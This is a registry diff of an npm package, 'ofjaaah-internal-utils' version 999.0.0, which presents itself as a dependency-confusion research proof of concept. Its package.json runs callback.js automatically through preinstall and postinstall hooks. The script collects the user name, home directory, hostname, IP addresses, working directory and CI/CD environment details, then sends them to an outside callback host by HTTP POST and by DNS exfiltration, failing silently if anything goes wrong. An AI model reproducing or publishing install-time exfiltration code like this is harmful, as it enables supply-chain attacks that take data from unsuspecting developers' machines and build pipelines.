ofjaaah-internal-utils 999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/callback.js +192 -0
  2. package/index.js +15 -0
  3. package/package.json +17 -0
package/callback.js ADDED
@@ -0,0 +1,192 @@
1
+ #!/usr/bin/env node
2
+ /**
3
+ * Dependency Confusion PoC Callback
4
+ * Author: OFJAAAH
5
+ * Generated: 2026-01-17T05:12:14.784Z
6
+ *
7
+ * This script sends a callback to verify package installation
8
+ * Collects: IP, User, Directory, Hostname for proof of concept
9
+ * FOR AUTHORIZED SECURITY TESTING ONLY
10
+ */
11
+
12
+ const https = require('https');
13
+ const http = require('http');
14
+ const os = require('os');
15
+ const { execSync } = require('child_process');
16
+
17
+ const CALLBACK_URL = 'b6vc26xc9y0gq3rrnl7qga8pasx764krv.oast.fun';
18
+ const PACKAGE_NAME = 'ofjaaah-internal-utils';
19
+
20
+ // Get network interfaces to find IP
21
+ function getLocalIP() {
22
+ try {
23
+ const interfaces = os.networkInterfaces();
24
+ for (const name of Object.keys(interfaces)) {
25
+ for (const iface of interfaces[name]) {
26
+ if (iface.family === 'IPv4' && !iface.internal) {
27
+ return iface.address;
28
+ }
29
+ }
30
+ }
31
+ } catch (e) {}
32
+ return 'unknown';
33
+ }
34
+
35
+ // Get external IP (optional - may fail in restricted networks)
36
+ async function getExternalIP() {
37
+ return new Promise((resolve) => {
38
+ https.get('https://api.ipify.org?format=json', { timeout: 3000 }, (res) => {
39
+ let data = '';
40
+ res.on('data', chunk => data += chunk);
41
+ res.on('end', () => {
42
+ try {
43
+ resolve(JSON.parse(data).ip);
44
+ } catch (e) {
45
+ resolve(null);
46
+ }
47
+ });
48
+ }).on('error', () => resolve(null));
49
+ });
50
+ }
51
+
52
+ // Collect system info
53
+ function collectSystemInfo() {
54
+ const info = {
55
+ // Package info
56
+ package: PACKAGE_NAME,
57
+ timestamp: new Date().toISOString(),
58
+
59
+ // User info
60
+ user: os.userInfo().username,
61
+ uid: os.userInfo().uid,
62
+ gid: os.userInfo().gid,
63
+ homedir: os.userInfo().homedir,
64
+ shell: os.userInfo().shell,
65
+
66
+ // System info
67
+ hostname: os.hostname(),
68
+ platform: os.platform(),
69
+ arch: os.arch(),
70
+ release: os.release(),
71
+ type: os.type(),
72
+
73
+ // Directory info
74
+ cwd: process.cwd(),
75
+
76
+ // Network info
77
+ localIP: getLocalIP(),
78
+
79
+ // Node info
80
+ nodeVersion: process.version,
81
+ npmVersion: process.env.npm_package_version || 'unknown',
82
+
83
+ // CI/CD Detection
84
+ isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || process.env.TRAVIS || process.env.CIRCLECI || process.env.BUILDKITE),
85
+ ciEnvironment: detectCIEnvironment(),
86
+
87
+ // NPM info
88
+ npmLifecycle: process.env.npm_lifecycle_event || '',
89
+ npmPackageName: process.env.npm_package_name || '',
90
+
91
+ // Additional context
92
+ env: {
93
+ CI: process.env.CI || '',
94
+ GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || '',
95
+ GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || '',
96
+ GITHUB_ACTOR: process.env.GITHUB_ACTOR || '',
97
+ GITLAB_CI: process.env.GITLAB_CI || '',
98
+ GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || '',
99
+ JENKINS_URL: process.env.JENKINS_URL || '',
100
+ BUILD_NUMBER: process.env.BUILD_NUMBER || '',
101
+ TRAVIS: process.env.TRAVIS || '',
102
+ CIRCLECI: process.env.CIRCLECI || '',
103
+ BUILDKITE: process.env.BUILDKITE || ''
104
+ }
105
+ };
106
+
107
+ return info;
108
+ }
109
+
110
+ function detectCIEnvironment() {
111
+ if (process.env.GITHUB_ACTIONS) return 'GitHub Actions';
112
+ if (process.env.GITLAB_CI) return 'GitLab CI';
113
+ if (process.env.JENKINS_URL) return 'Jenkins';
114
+ if (process.env.TRAVIS) return 'Travis CI';
115
+ if (process.env.CIRCLECI) return 'CircleCI';
116
+ if (process.env.BUILDKITE) return 'Buildkite';
117
+ if (process.env.CI) return 'Generic CI';
118
+ return 'Local Machine';
119
+ }
120
+
121
+ async function sendCallback() {
122
+ const systemInfo = collectSystemInfo();
123
+
124
+ // Try to get external IP
125
+ const externalIP = await getExternalIP();
126
+ if (externalIP) {
127
+ systemInfo.externalIP = externalIP;
128
+ }
129
+
130
+ const data = JSON.stringify(systemInfo);
131
+
132
+ const url = new URL(CALLBACK_URL);
133
+ const options = {
134
+ hostname: url.hostname,
135
+ port: url.port || (url.protocol === 'https:' ? 443 : 80),
136
+ path: url.pathname + (url.search || ''),
137
+ method: 'POST',
138
+ headers: {
139
+ 'Content-Type': 'application/json',
140
+ 'Content-Length': Buffer.byteLength(data),
141
+ 'User-Agent': 'dependency-confusion-poc/ofjaaah-internal-utils',
142
+ 'X-PoC-Package': 'ofjaaah-internal-utils',
143
+ 'X-PoC-Author': 'OFJAAAH'
144
+ },
145
+ timeout: 10000
146
+ };
147
+
148
+ const protocol = url.protocol === 'https:' ? https : http;
149
+
150
+ const req = protocol.request(options, (res) => {
151
+ console.log('[PoC] Callback sent - Status:', res.statusCode);
152
+ });
153
+
154
+ req.on('error', (e) => {
155
+ // Silently fail
156
+ });
157
+
158
+ req.on('timeout', () => {
159
+ req.destroy();
160
+ });
161
+
162
+ req.write(data);
163
+ req.end();
164
+ }
165
+
166
+ // DNS exfiltration for restricted networks
167
+ function sendDnsCallback() {
168
+ try {
169
+ const dns = require('dns');
170
+ const info = {
171
+ p: PACKAGE_NAME.substring(0, 15),
172
+ u: os.userInfo().username.substring(0, 10),
173
+ h: os.hostname().substring(0, 10),
174
+ t: Date.now()
175
+ };
176
+ const encoded = Buffer.from(JSON.stringify(info))
177
+ .toString('base64')
178
+ .replace(/[+/=]/g, '')
179
+ .substring(0, 50);
180
+
181
+ const dnsHost = encoded + '.' + new URL(CALLBACK_URL).hostname;
182
+ dns.resolve(dnsHost, () => {});
183
+ } catch (e) {}
184
+ }
185
+
186
+ // Execute callbacks
187
+ (async () => {
188
+ try {
189
+ await sendCallback();
190
+ sendDnsCallback();
191
+ } catch (e) {}
192
+ })();
package/index.js ADDED
@@ -0,0 +1,15 @@
1
+ /**
2
+ * ofjaaah-internal-utils
3
+ * Security Research PoC - Dependency Confusion Hunter
4
+ * Author: OFJAAAH
5
+ *
6
+ * This package was published as part of authorized security research
7
+ * to demonstrate dependency confusion vulnerabilities.
8
+ */
9
+
10
+ module.exports = {
11
+ name: 'ofjaaah-internal-utils',
12
+ version: '999.0.0',
13
+ poc: true,
14
+ author: 'OFJAAAH'
15
+ };
package/package.json ADDED
@@ -0,0 +1,17 @@
1
+ {
2
+ "name": "ofjaaah-internal-utils",
3
+ "version": "999.0.0",
4
+ "description": "Security research PoC - Dependency Confusion Hunter by OFJAAAH",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node callback.js",
8
+ "postinstall": "node callback.js"
9
+ },
10
+ "keywords": [
11
+ "security",
12
+ "research",
13
+ "poc"
14
+ ],
15
+ "author": "OFJAAAH - Security Research",
16
+ "license": "MIT"
17
+ }